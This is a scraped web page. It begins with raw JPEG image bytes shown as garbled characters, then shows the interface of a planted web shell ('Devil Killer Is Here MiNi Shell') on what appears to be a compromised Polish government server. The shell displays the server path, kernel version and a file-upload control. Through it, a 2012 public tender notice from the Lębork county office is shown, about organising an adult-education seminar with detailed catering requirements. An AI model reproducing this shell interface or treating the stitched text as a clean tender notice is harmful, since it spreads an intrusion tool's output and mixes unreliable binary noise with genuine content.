JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/283454-N-2012.html

<p class="kh_header"><b>Lębork: Zorganizowanie i przeprowadzenie seminarium poświęconego zmianom w prawodawstwie odnośnie kształcenia osób dorosłych wraz z usługami towarzyszącymi w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych)</b><br>
<b>Numer ogłoszenia: 283454 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-lebork.com/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie seminarium poświęconego zmianom w prawodawstwie odnośnie kształcenia osób dorosłych wraz z usługami towarzyszącymi w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie seminarium poświęconego zmianom w prawodawstwie odnośnie kształcenia osób dorosłych wraz z usługami towarzyszącymi w ramach projektu pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych):
1)	dokonanie wyboru odpowiednich prelegentów, posiadających odpowiednią wiedzę i doświadczenie w zakresie tematyki, która ma być poruszana podczas seminarium;
2)	stała współpraca przy rekrutacji, którą przeprowadzi Zamawiający (m.in. pomoc w działaniach promocyjnych mających na celu pozyskanie oczekiwanej liczby uczestników seminarium, kontaktowanie się z potencjalnymi uczestnikami seminarium itp.);
3)	zapewnienie pomieszczenia (sala wykładowa dla 70 osób) wraz z niezbędnymi powierzchniami wspólnymi (WC, szatnia) oraz pozostałymi pomieszczeniami niezbędnymi do prawidłowej i należytej realizacji Zamówienia (pomieszczenie, w którym będzie spożywany posiłek przez uczestników projektu - przerwa kawowa, lunch);
4)	zapewnienie wyżywienia dla uczestników seminarium wraz z niezbędną obsługą. Wyżywienie powinno zostać podane w formie stołu szwedzkiego i składać się co najmniej z:
- Napojów gorących, w tym:
-- Kawy czarnej rozpuszczalnej w ilości minimum 200 ml na osobę
-- Herbatę czarną tradycyjną w ilości minimum 200 ml na osobę
-- Cukru bez ograniczeń, mleczka lub śmietanki do kawy w płynie bez ograniczeń, cytryny w plasterkach do herbaty i serwetek dla wszystkich uczestników
- Napojów zimnych, w tym:
-- Wody mineralnej niegazowanej - w ilości minimum 200 ml na osobę
-- Soków owocowych (co najmniej 2 rodzaje) - w ilości łącznie minimum 200 ml na osobę
- 3 dania na zimno:
-- mix pieczonych mięs i pasztetów - łącznie minimum 4 kg
-- sałatka, co najmniej 3 rodzaje, np. grecka, jarzynowa, ryżowa - łącznie minimum 75 gram na osobę
-- jaja faszerowane - minimum 1 sztuka na osobę
Do dań na zimno Wykonawca zapewni świeże pieczywo: białe i ciemne w ilości 2 kromki na osobę oraz masło.
- 4 dania na gorąco:
-- zupa:
barszcz czerwony podawany z pasztecikiem/zupa gulaszowa/ strogonow - minimum 10 litrów
-- 3 rodzaje dań mięsnych:
kęski drobiowe - minimum 100 gram na osobę
pulpeciki- minimum 100 sztuk po 75 gram 
krokiety mięsne/grzybowe- łącznie minimum 65 sztuk
Do mięs na ciepło Wykonawca zapewni co najmniej 2 rodzaje sosów.
- dań deserowych:
-- Ciast - co najmniej 3 rodzaje, typu: sernik, jabłecznik, z owocami - każdego typu minimum po 40 porcji po 100 gram każda porcja
-- Owoców- co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) - łącznie minimum 5 kg

Wykonawca zapewni w ramach poczęstunku świeże produkty dostępne na rynku. Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia. Świadczenie usług żywienia odbywać się powinno według ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914 z późn. zm.)
5)	zapewnienie wyposażenia sali, w której przeprowadzone zostanie seminarium, a także sprzętu technicznego wraz z niezbędną obsługą;
6)	wyposażenie uczestników seminarium w materiały szkoleniowe (nieodpłatnie) niepodlegające zwrotowi w formie papierowej - kompendium wiedzy dotyczące zagadnień omawianych podczas konsultacji oraz pendrive o pojemności co najmniej 2 GB, gdzie mają być zapisane prezentacje wykładowców używane w trakcie seminarium w formie elektronicznej. Taki zestaw ma zostać wydrukowany w 71 egzemplarzach (dla każdego z uczestników seminarium oraz jeden egzemplarz dla Zamawiającego). Kompendium wiedzy ma zawierać minimum 20 stron oraz muszą być oznaczone w odpowiednie logotypy POKL zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl;
7)	opracowanie, przygotowanie materiałów dla uczestników seminarium na podstawie prezentacji, programu i innych materiałów sporządzonych przez Wykonawcę, wydrukowanie ich w kolorze (zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl), zszycie, konfekcjonowanie w teczki, dystrybucja przygotowanych zestawów materiałów wśród uczestników przed rozpoczęciem seminarium;
8)	opracowanie i realizacja scenografii oraz oznaczeń seminarium zgodnie z ustaleniami poczynionymi z Zamawiającym;
9)	przeprowadzenie działań mających na celu uzyskanie ocen uczestników nt. seminarium, w tym w szczególności przygotowanie ankiet ewaluacyjnych w porozumieniu z Zamawiającym, rozdanie i zebranie ankiet od uczestników, sporządzenie w oparciu o dane zawarte w ankietach raportu;
10)	niezwłocznie po podpisaniu umowy przedstawiciele Wykonawcy i Zamawiającego uzgodnią propozycję programu seminarium, listę osób zaproszonych. Zamawiający opracuje wzór zaproszeń i będzie odpowiedzialny za ich przesłanie do osób zaproszonych; 
11)	Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych;
12)	po zakończeniu seminarium Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe. Zapłata następuje w terminie 14 dni od dnia doręczenia prawidłowo wystawionej faktury VAT/rachunku.

W przypadku, w którym pewne zadania lub usługi Wykonawcy nie zostały doprecyzowane w ramach SIWZ a w szczególności w ramach niniejszego Szczegółowego Opisu Przedmiotu Zamówienia oraz treści umowy, stanowiącej załącznik do SIWZ, Wykonawca zobowiązuje się wykonać to zadanie zgodnie z właściwymi przepisami kodeksu cywilnego, mając na uwadze wskazania Zamawiającego, zgodnie z najwyższymi standardami a także wiedzą i doświadczeniem Wykonawcy w sposób, jaki w największym stopniu realizuje to cele danego zadania lub usługi. Wszelkie koszty związane z wykonaniem przedmiotu zamówienia ponosi Wykonawca.
1.	OGÓLNE INFORMACJE O PROJEKCIE


Głównym celem projektu jest podniesienie kwalifikacji ogólnych i zawodowych 120 osób (60 kobiet, 60 mężczyzn), które z własnej inicjatywy deklarują chęć potwierdzenia swoich kwalifikacji zdobytych w sposób pozaformalny i nieformalny poprzez program formalnego ich potwierdzenia w formie egzaminów czeladniczych/mistrzowskich oraz wzmocnienie Powiatowego Centrum Edukacyjnego - Zespołu Szkół Ponadgimnazjalnych w Lęborku. 
Cele szczegółowe projektu to:
- umożliwienie osobom bezrobotnym i pracującym uzupełnienia wiedzy i potwierdzenia posiadanych kwalifikacji
- zwiększenie szans bezrobotnych nieposiadających potwierdzonych kwalifikacji na zatrudnienie
- utrzymanie zatrudnienia przez pracujących nieposiadających potwierdzonych kwalifikacji
- podniesienie rangi zawodów technicznych niezbędnych dla rozwoju gospodarki regionu
- poprawienie pozycji konkurencyjnej firm poprzez możliwość dokumentowania kwalifikacji pracowników

2.	CEL ZORGANIZOWANIA I PRZEPROWADZENIA SEMINARIUM 

Od 01.09.2012 roku wchodzi w życie nowe Rozporządzenie Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych, które zastąpi dotychczas obowiązujące regulacje prawne w tym zakresie. Nowe rozporządzenie zmienia szereg regulacji dotyczących kształcenia osób dorosłych, które obowiązywały dotychczas oraz zastąpi dotychczas obowiązujące rozporządzenia:
?	Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
?	Ministra Edukacji Narodowej z dnia 15 czerwca 2009 r. w sprawie publicznych placówek kształcenia ustawicznego, publicznych placówek kształcenia praktycznego oraz publicznych ośrodków dokształcania i doskonalenia zawodowego (Dz. U. Nr 99, poz. 828).

Beneficjent projektu jako organ prowadzący i dotujący szkoły prowadzące kształcenie zawodowe i placówki oświatowe widzi potrzebę organizacji seminarium w celu wyjaśnienia i upowszechnienia regulacji związanych z nowymi rodzajami form pozaszkolnych, warunkami, organizacją i trybem prowadzenia kształcenia. 
Upowszechnienie wiedzy nt. nowych regulacji prawnych, przybliżenie tematyki oraz przedstawienie pomysłów na rozwój placówek i szkół ma na celu zachęcenie do podejmowania inicjatyw dot. kształcenia osób dorosłych. Realizacja seminarium przyczyni się do możliwości dotarcia z niezbędnymi informacjami do większej liczby osób oraz wprost do osiągnięcia celów projektu, w tym celu szczegółowego: podniesienie rangi zawodów technicznych niezbędnych dla rozwoju gospodarki regionu.
Na realizację celu szczegółowego będzie wpływał ściśle dostosowany program seminarium, obejmujący zmiany w prawodawstwie oraz promujący zawody techniczne niezbędne dla rozwoju regionu - m.in. poprzez wyeksponowanie wyników badań przeprowadzonych w ramach projektu.
Realizacja tego przedsięwzięcia wpłynie na zwiększenie produktów (1 seminarium) i rezultatów projektu -wśród uczestników seminarium wzrośnie wiedza z zakresu potrzeb edukacyjnych dorosłych w powiecie lęborskim, edukacji ustawicznej, potrzeb lokalnego rynku pracy oraz zwiększy się świadomość co możliwości podjęcia formalnego kształcenia wśród dorosłych mieszkańców regionu.

3.	PROGRAM TEMATYCZNY, KTÓRY MUSI OBEJMOWAĆ SEMINARIUM:

1.	Nowe przepisy regulujące system kształcenia zawodowego i ustawicznego dla osób dorosłych:
- Rozporządzenie MEN z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012 poz. 186).
2.	Podstawowe obszary zmian w szkolnictwie zawodowym:
- klasyfikacja zawodów szkolnictwa zawodowego,
- podstawa programowa kształcenia ogólnego i kształcenia w zawodach,
- organizacja pracy szkół i placówek kształcenia zawodowego - ramowe plany nauczania,
- system egzaminów potwierdzających kwalifikacje zawodowe,
- kwalifikacyjne kursy zawodowe.
3.	Zmiany w przepisach oświatowych regulujących pracę szkół i placówek prowadzących kształcenie zawodowe:
- Ustawa z dnia 19 sierpnia 2011r. o zmianie ustawy o systemie oświaty oraz niektórych innych ustaw (Dz. U. 2011 nr 205, poz. 1206)
- Rozporządzenie MEN z dnia 23 grudnia 2011r. w sprawie klasyfikacji zawodów szkolnictwa zawodowego (Dz. U. 2012  poz. 7)
- Rozporządzenie MEN z dnia 7 lutego 2012r. w sprawie podstawy programowej kształcenia w zawodach (Dz. U. 2012  poz. 184)
- Rozporządzenie MEN z dnia 11 stycznia 2012 r. w sprawie egzaminów eksternistycznych (Dz. U. 2012 nr 0 poz. 188)
- Rozporządzenie MEN zmieniające rozporządzenie w sprawie warunków i sposobów oceniania, klasyfikowania i promowania uczniów i słuchaczy oraz przeprowadzania sprawdzianów i egzaminów w szkołach publicznych (projekt)
- Rozporządzenie MEN z dnia 7 lutego 2012r. w sprawie ramowych planów nauczania w szkołach publicznych (Dz. U. 2012  poz. 204)
- Rozporządzenie MEN w sprawie ramowych statutów publicznego przedszkola oraz publicznych szkół (projekt)
4.	Monitoring potrzeb oraz rozszerzenie lub dostosowanie oferty edukacyjnej do potrzeb regionalnego i lokalnego rynku pracy (omówione na podstawie badań przeprowadzonych w ramach projektu, które zostaną udostępnione Wykonawcy po podpisaniu umowy)
5.	Upowszechnienie wiedzy nt. nowych regulacji prawnych, przybliżenie tematyki oraz przedstawienie pomysłów na rozwój placówek i szkół ma na celu zachęcenie do podejmowania inicjatyw dot. kształcenia osób dorosłych.

Seminarium polegać będzie w szczególności na prezentacji prelegentów z powyższego zakresu tematycznego, wymianie doświadczeń, ćwiczeniach praktycznych oraz odpowiedziach na pytania uczestników seminarium na konkretne problemy praktyczne z powyższego zakresu.

4.	ADRESACI

Odbiorcami seminarium mają być przede wszystkim:
?	dyrektorzy szkół z terenu powiatu lęborskiego prowadzących kształcenie zawodowe, 
?	nauczyciele kształcenia zawodowego zatrudnieni w szkołach ,dla których organem prowadzącym jest Powiat Lęborski oraz  w placówkach, które dotuje Powiat, 
?	przedstawiciele Instytucji rynku pracy z terenu powiatu lęborskiego,
?	pracodawcy z terenu powiatu lęborskiego (zwłaszcza zrzeszeni w Powiatowym Cechu Rzemiosła i Przedsiębiorczości w Lęborku),
?	przedstawiciele środowisk rzemieślniczych i kupieckich z terenu powiatu lęborskiego
?	inni zainteresowani tą tematyką. 

5.	LICZBA UCZESTNIKÓW

Zamawiający przewiduje, iż uczestnikami seminarium ma być 70 osób.

6.	CZAS TRWANIA SEMINARIUM

Seminarium ma trwać łącznie 5 godzin zegarowych, w tym dwie przerwy (kawowa oraz na lunch) po 20 minut każda.

7.	MIEJSCE ODBYWANIA SEMINARIUM

Seminarium ma odbywać się na terenie Lęborka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 80.52.20.00-9, 55.30.00.00-3, 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli zapewni pomieszczenia (sala wykładowa dla 70 osób) wraz z niezbędnymi powierzchniami wspólnymi (WC, szatnia) oraz pozostałymi pomieszczeniami niezbędnymi do prawidłowej i należytej realizacji Zamówienia (pomieszczenie, w którym będzie spożywany posiłek przez uczestników projektu - przerwa kawowa, lunch), wyposażone w sprawny sprzęt oraz inne środki techniczne niezbędne do realizacji seminarium

Na potwierdzenie tego warunku Wykonawcy zobowiązani są załączyć do oferty:
- Oświadczenie, że dysponują lub będą dysponować w/w pomieszczeniem- załącznik nr 5 do SIWZ
- Oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował co najmniej dwiema osobami dyspozycyjnymi w dni powszednie, która będą uczestniczyć w wykonywaniu zamówienia. Osoby muszą spełnić poniższe wymaganie: 
?posiada doświadczenie w przeprowadzeniu co najmniej 3 seminariów/kursów/szkoleń/warsztatów/wykładów akademickich/konferencji o tematyce zbliżonej do przedmiotu zamówienia w ostatnich 3 latach.

Na potwierdzenie tego warunku Wykonawcy zobowiązani są załączyć do oferty:
- Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu potwierdzenia spełniania opisanych przez Zamawiającego warunków udziału w postępowaniu, Wykonawcy ubiegający się o udzielenie niniejszego zamówienia obowiązani są przedłożyć:
1)	wypełniony i podpisany formularz ofertowy (z wykorzystaniem wzoru stanowiącego załącznik nr 1 do SIWZ)
2)	oświadczenie w trybie art. 22 ust. 1 ustawy Pzp(z wykorzystaniem wzoru stanowiącego załącznik nr 2 do SIWZ)
3)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (z wykorzystaniem wzoru stanowiącego załącznik nr 4 do SIWZ)
4)	oświadczenie, że dysponuję/będzie dysponował* pomieszczeniem przystosowanym/pomieszczeniami przystosowanymi* do realizacji przedmiotu zamówienia znajdującym/znajdującymi* się w Lęborku (z wykorzystaniem wzoru stanowiącego załącznik nr 5 do SIWZ)
2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy ubiegający się o udzielenie niniejszego zamówienia obowiązani są przedłożyć:
a)	oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp (z wykorzystaniem wzoru stanowiącego załącznik nr 3 do SIWZ)
3.	W przypadku wnoszenia oferty wspólnej przez dwa podmioty lub więcej podmiotów gospodarczych każdy z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust.1 Pzp. (załącznik nr 3).
4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
5.	Zamawiający wymaga wskazania w ofercie części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom (jeżeli Wykonawca przewiduje taki udział).
6.	W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (z wykorzystaniem wzoru stanowiącego załącznik nr 7 do SIWZ). Jeżeli z uzasadnionej przyczyny nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia dokumenty jak wyżej, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

